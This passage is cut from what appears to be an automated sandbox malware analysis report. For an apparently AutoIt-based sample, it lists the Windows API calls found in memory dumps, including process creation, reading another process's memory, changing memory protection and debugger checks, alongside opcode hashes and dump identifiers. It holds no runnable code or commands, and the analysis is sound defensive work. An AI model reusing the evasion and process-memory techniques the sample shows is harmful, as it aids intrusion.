                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Name$Path$FileFullLongOpen_memset
                            • String ID: X
                            • API String ID: 3777226403-3081909835
                            • Opcode ID: 5190213df8bb60b3a0f2e44ee449a00a098afddd480a4485f5e638a15d2fc2fe
                            • Instruction ID: 50716638cb3b61cf67d1df5335fe78f4147436375996fad3b27f69d667342b3a
                            • Opcode Fuzzy Hash: 5190213df8bb60b3a0f2e44ee449a00a098afddd480a4485f5e638a15d2fc2fe
                            • Instruction Fuzzy Hash: 7321C031A002889BCF419F94C845BEE7BF8EF49714F04805AE548AB241DBB499899FB2
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __fread_nolock_memmove
                            • String ID: EA06
                            • API String ID: 1988441806-3962188686
                            • Opcode ID: 87ed7ea9b85f1151f66fb07ef5325c90f24f063065450869cb79a52c510abe04
                            • Instruction ID: 82d6f1df9dd1ef3ae6c5baa9c569d807776eb97199d48e76fa57bd275de73d9a
                            • Opcode Fuzzy Hash: 87ed7ea9b85f1151f66fb07ef5325c90f24f063065450869cb79a52c510abe04
                            • Instruction Fuzzy Hash: 0201F9718042187FDF18CAA8DC16EFE7BF8DB11311F00419AF552D2181E875E6089770
                            APIs
                            • GetTempPathW.KERNEL32(00000104,?), ref: 00DA98F8
                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00DA990F
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Temp$FileNamePath
                            • String ID: aut
                            • API String ID: 3285503233-3010740371
                            • Opcode ID: 438e9368b16d28879891f21cc79f98250cdbb29b3e5fb2c5627648ae16c359bb
                            • Instruction ID: 28c0d1128cb5ba81e0ec9d07bd68d72624943c4c3c253c66e4688f473872cd97
                            • Opcode Fuzzy Hash: 438e9368b16d28879891f21cc79f98250cdbb29b3e5fb2c5627648ae16c359bb
                            • Instruction Fuzzy Hash: 94D05B7554030E6BDB509B90EC0DFDAB73CD704704F0042B1BB54D1191D97055589BA5
                            APIs
                            • CreateProcessW.KERNEL32(?,00000000), ref: 009935D5
                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0099361B
                            Memory Dump Source
                            • Source File: 00000005.00000002.486369482.0000000000991000.00000040.00000020.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_991000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Process$CreateMemoryRead
                            • String ID:
                            • API String ID: 2726527582-0
                            • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                            • Instruction ID: 6b99b8c96177a8cd3c26c733b13aacdcc51d4e936474a469f55ad39951414537
                            • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                            • Instruction Fuzzy Hash: 82620D70A14258DBEB24DFA4C841BDEB376EF58700F1091A9E10DEB390E7799E81CB59
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d205ca62c79f8209260e885c3bb693e60dd8c488d91215edd9c4d170ab14c494
                            • Instruction ID: 70c6f3cf963c7eeabfc41cfc05061f1d31421c5e14c2a6bdad285c747df13ae7
                            • Opcode Fuzzy Hash: d205ca62c79f8209260e885c3bb693e60dd8c488d91215edd9c4d170ab14c494
                            • Instruction Fuzzy Hash: ACF12675608301DFCB14DF29C480A6ABBE5FF88314F14896EF89A9B251D730E945CFA2
                            APIs
                            • _memset.LIBCMT ref: 00D44370
                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D44415
                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D44432
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: IconNotifyShell_$_memset
                            • String ID:
                            • API String ID: 1505330794-0
                            • Opcode ID: d18314135eda73f3c1a8e58272d5adabb510e53ace3219c6d31a6dc4085fc205
                            • Instruction ID: e10861f5de96550c42d6375910ff2492a0f375538a52fd489ecc544f79ddf454
                            • Opcode Fuzzy Hash: d18314135eda73f3c1a8e58272d5adabb510e53ace3219c6d31a6dc4085fc205
                            • Instruction Fuzzy Hash: 49316FB15057018FD721DF65D88479BBBF8FF48708F04092EF59A92251E771A988CBA2
                            APIs
                            • __FF_MSGBANNER.LIBCMT ref: 00D65733
                              • Part of subcall function 00D6A16B: __NMSG_WRITE.LIBCMT ref: 00D6A192
                              • Part of subcall function 00D6A16B: __NMSG_WRITE.LIBCMT ref: 00D6A19C
                            • __NMSG_WRITE.LIBCMT ref: 00D6573A
                              • Part of subcall function 00D6A1C8: GetModuleFileNameW.KERNEL32(00000000,00E033BA,00000104,?,00000001,00000000), ref: 00D6A25A
                              • Part of subcall function 00D6A1C8: ___crtMessageBoxW.LIBCMT ref: 00D6A308
                              • Part of subcall function 00D6309F: ___crtCorExitProcess.LIBCMT ref: 00D630A5
                              • Part of subcall function 00D6309F: ExitProcess.KERNEL32 ref: 00D630AE
                              • Part of subcall function 00D68B28: __getptd_noexit.LIBCMT ref: 00D68B28
                            • RtlAllocateHeap.NTDLL(00900000,00000000,00000001,00000000,?,?,?,00D60DD3,?), ref: 00D6575F
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                            • String ID:
                            • API String ID: 1372826849-0
                            • Opcode ID: d28181a7f106ec51f917d952df87015243c653700b95b9114460bee8cadf5997
                            • Instruction ID: 0cf574615b8e94ae8615ae0a094d3fe73f07139849a0354993ee9aa936658a1b
                            • Opcode Fuzzy Hash: d28181a7f106ec51f917d952df87015243c653700b95b9114460bee8cadf5997
                            • Instruction Fuzzy Hash: 2501F131240B02DFD6107B7AFC92A2E738CCB92362F140136F556AA2D6DE709C814A70
                            APIs
                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00DA98BB
                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00DA9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00DA98D1
                            • CloseHandle.KERNEL32(00000000), ref: 00DA98D8
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleTime
                            • String ID:
                            • API String ID: 3397143404-0
                            • Opcode ID: 074d2d8c42667c56f5d207dd1473d1c3c36e744ee1a33b6165c261ccd30e8d05
                            • Instruction ID: ff231efca1a958d21d3badff3d358a7c12de85db8562642e3f324b2a536f22a8
                            • Opcode Fuzzy Hash: 074d2d8c42667c56f5d207dd1473d1c3c36e744ee1a33b6165c261ccd30e8d05
                            • Instruction Fuzzy Hash: 01E08632141316B7D7211B64EC09FCA7B1AAB06760F144220FB14A91E087B1251197A8
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID: CALL
                            • API String ID: 0-4196123274
                            • Opcode ID: 267b93036c8f1e705f69591db8bcf7dd507757f3c993bdd4182077b8b7e7a86c
                            • Instruction ID: a50279f865a81f42a86d77d9ece15174a49e9419e69fa0a88080afd14a948be6
                            • Opcode Fuzzy Hash: 267b93036c8f1e705f69591db8bcf7dd507757f3c993bdd4182077b8b7e7a86c
                            • Instruction Fuzzy Hash: 9A224874508201DFDB24DF18C495A6ABBE1FF84314F18896DF89A9B262D731EC45CBA2
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: EA06
                            • API String ID: 4104443479-3962188686
                            • Opcode ID: d09c17ef4ed2d36f4849ea13f2be61c4f3fd74992692385f4b66dd0393a095b1
                            • Instruction ID: a1df177486601a2bb95b693f8b68e4b7e59af5cfd302f892985720f3ccfc29f2
                            • Opcode Fuzzy Hash: d09c17ef4ed2d36f4849ea13f2be61c4f3fd74992692385f4b66dd0393a095b1
                            • Instruction Fuzzy Hash: 69412A21E041586BDF219B6498917BF7FA2EF45310F6C4475FCC6AB286D7209DC487B2
                            APIs
                            • IsThemeActive.UXTHEME ref: 00D44834
                              • Part of subcall function 00D6336C: __lock.LIBCMT ref: 00D63372
                              • Part of subcall function 00D6336C: DecodePointer.KERNEL32(00000001,?,00D44849,00D97C74), ref: 00D6337E
                              • Part of subcall function 00D6336C: EncodePointer.KERNEL32(?,?,00D44849,00D97C74), ref: 00D63389
                              • Part of subcall function 00D448FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000,00000000,?,0092A2E8,?,00D4485C), ref: 00D44915
                              • Part of subcall function 00D448FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,0092A2E8,?,00D4485C), ref: 00D4492A
                              • Part of subcall function 00D43B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D43B68
                              • Part of subcall function 00D43B3A: IsDebuggerPresent.KERNEL32 ref: 00D43B7A
                              • Part of subcall function 00D43B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E052F8,00E052E0,?,?), ref: 00D43BEB
                              • Part of subcall function 00D43B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00D43C6F
                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D44874
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                            • String ID:
                            • API String ID: 1438897964-0
                            • Opcode ID: 6bb47f08c974be823de5aed410dd24894238f4bfff6955b9b9dcac7d58031aa4
                            • Instruction ID: d2495673c4fee3eb6c607412929b4244694c9ef006468b771009865281bd0dd5
                            • Opcode Fuzzy Hash: 6bb47f08c974be823de5aed410dd24894238f4bfff6955b9b9dcac7d58031aa4
                            • Instruction Fuzzy Hash: F1116A729083069FC700DF2AD845A0EBFE8EF95750F10451EF040A32B1DB719999CFA2
                            APIs
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D45CC7
                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00D7DD73
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 0212d67f203df633530240b2a9acaaa4621a24bdbe6dc89e49ad1444547c34b6
                            • Instruction ID: ff3fda396e386ca2f2accadc07a7e64dd504f98cb00a2f70abcae1eca02942cd
                            • Opcode Fuzzy Hash: 0212d67f203df633530240b2a9acaaa4621a24bdbe6dc89e49ad1444547c34b6
                            • Instruction Fuzzy Hash: A5019270284749BFF3210E25DCCAF763BDCEB01768F148319BAE59A1E1C6B45C488B60
                            APIs
                              • Part of subcall function 00D6571C: __FF_MSGBANNER.LIBCMT ref: 00D65733
                              • Part of subcall function 00D6571C: __NMSG_WRITE.LIBCMT ref: 00D6573A
                              • Part of subcall function 00D6571C: RtlAllocateHeap.NTDLL(00900000,00000000,00000001,00000000,?,?,?,00D60DD3,?), ref: 00D6575F
                            • std::exception::exception.LIBCMT ref: 00D60DEC
                            • __CxxThrowException@8.LIBCMT ref: 00D60E01
                              • Part of subcall function 00D6859B: RaiseException.KERNEL32(?,?,?,00DF9E78,00000000,?,?,?,?,00D60E06,?,00DF9E78,?,00000001), ref: 00D685F0
                            Similarity
                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                            • String ID:
                            • API String ID: 3902256705-0
                            Similarity
                            • API ID: __lock_file_memset
                            • String ID:
                            • API String ID: 26237723-0
                            APIs
                              • Part of subcall function 00D68B28: __getptd_noexit.LIBCMT ref: 00D68B28
                            • __lock_file.LIBCMT ref: 00D653EB
                              • Part of subcall function 00D66C11: __lock.LIBCMT ref: 00D66C34
                            • __fclose_nolock.LIBCMT ref: 00D653F6
                            Similarity
                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                            • String ID:
                            • API String ID: 2800547568-0
                            APIs
                            • InitializeCriticalSectionEx.KERNELBASE(00000000,00000000,00D69A0E,?,00D69D0B,00000000,00000FA0,00000000,00DFA1A8,00000008,00D69C22,00000000,00000000,?,00D69A7C,0000000D), ref: 00D69E44
                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000000,?,00D69D0B,00000000,00000FA0,00000000,00DFA1A8,00000008,00D69C22,00000000,00000000,?,00D69A7C,0000000D), ref: 00D69E4E
                            Similarity
                            • API ID: CriticalInitializeSection$CountSpin
                            • String ID:
                            • API String ID: 4156364057-0
                            APIs
                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000), ref: 00D45B96
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            APIs
                              • Part of subcall function 00D44BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00D44BEF
                              • Part of subcall function 00D6525B: __wfsopen.LIBCMT ref: 00D65266
                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D44E0F
                              • Part of subcall function 00D44B6A: FreeLibrary.KERNEL32(00000000), ref: 00D44BA4
                              • Part of subcall function 00D44C70: _memmove.LIBCMT ref: 00D44CBA
                            Similarity
                            • API ID: Library$Free$Load__wfsopen_memmove
                            • String ID:
                            • API String ID: 1396898556-0
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            APIs
                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000), ref: 00D45C16
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            APIs
                            • __lock_file.LIBCMT ref: 00D648A6
                              • Part of subcall function 00D68B28: __getptd_noexit.LIBCMT ref: 00D68B28
                            Similarity
                            • API ID: __getptd_noexit__lock_file
                            • String ID:
                            • API String ID: 2597487223-0
                            APIs
                            • FreeLibrary.KERNEL32(?,?,00E052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D44E7E
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            APIs
                            • GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,00D472BD,00000001,00E06290,?,00D43BBB,00E052F8,00E052E0,?,?), ref: 00D607B0
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: LongNamePath_memmove
                            • String ID:
                            • API String ID: 2514874351-0
                            • Opcode ID: 7f475b5c7052421d2edae3f01430a629908446b3434ee6d8ae800471bb5e73c4
                            • Instruction ID: 4ef72a288ffcfb6fcacc23d4fdc276fd67713c94499a5f5b546efb841d1b296c
                            • Opcode Fuzzy Hash: 7f475b5c7052421d2edae3f01430a629908446b3434ee6d8ae800471bb5e73c4
                            • Instruction Fuzzy Hash: 33E0CD369042295BC721D65C9C05FEAB7DDDF887A0F0441B5FD0CD7304DA609C808AF0
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __fread_nolock
                            • String ID:
                            • API String ID: 2638373210-0
                            • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                            • Instruction ID: 515f0cab9d62a6b87999a2b0dd5226866eedafed98db2078c9a4cec6c5ea71a6
                            • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                            • Instruction Fuzzy Hash: 42E092B1504B009BD7388E24D800BA373E1EB06304F04081DF6AA83241EB6378419769
                            APIs
                              • Part of subcall function 00D63217: __lock.LIBCMT ref: 00D63219
                            • __onexit_nolock.LIBCMT ref: 00D62C60
                              • Part of subcall function 00D62C88: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,00D62C65,00D7B5BA,00DF9ED0), ref: 00D62C9B
                              • Part of subcall function 00D62C88: DecodePointer.KERNEL32(?,?,00D62C65,00D7B5BA,00DF9ED0), ref: 00D62CA6
                              • Part of subcall function 00D62C88: __realloc_crt.LIBCMT ref: 00D62CE7
                              • Part of subcall function 00D62C88: __realloc_crt.LIBCMT ref: 00D62CFB
                              • Part of subcall function 00D62C88: EncodePointer.KERNEL32(00000000,?,?,00D62C65,00D7B5BA,00DF9ED0), ref: 00D62D0D
                              • Part of subcall function 00D62C88: EncodePointer.KERNEL32(00D7B5BA,?,?,00D62C65,00D7B5BA,00DF9ED0), ref: 00D62D1B
                              • Part of subcall function 00D62C88: EncodePointer.KERNEL32(00000004,?,?,00D62C65,00D7B5BA,00DF9ED0), ref: 00D62D27
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                            • String ID:
                            • API String ID: 3536590627-0
                            • Opcode ID: a4484af2a16eb4dd773ec0a06d0d373d5f8cefde867d2d21413a1357ddcf8aef
                            • Instruction ID: 1df224b725751e114cc8fee5eb917c6858123bfc839ece3eae33ea337617d6d6
                            • Opcode Fuzzy Hash: a4484af2a16eb4dd773ec0a06d0d373d5f8cefde867d2d21413a1357ddcf8aef
                            • Instruction Fuzzy Hash: B3D01271D4160DABDB10BBA4C90676C7A60EF14722F518345F014661C2CB780B019FB6
                            APIs
                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00D45C5F
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: d58b6823a038b89e329c52ffe466fefe2bc1fc2fb993e80a77b547a9574b1d47
                            • Instruction ID: ac19681d533f891a23f18a6c2571954a50ca63fbdcb89ca80cb999f0cfa02492
                            • Opcode Fuzzy Hash: d58b6823a038b89e329c52ffe466fefe2bc1fc2fb993e80a77b547a9574b1d47
                            • Instruction Fuzzy Hash: 92D0C77464030CBFE710DB80DC46FA9777DD705710F100194FD0496390D6B27D508795
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __wfsopen
                            • String ID:
                            • API String ID: 197181222-0
                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                            • Instruction ID: bfefa9ff1d3727d894571984ac0ce34836e9130a130934dfec95e3fc6c0d46f8
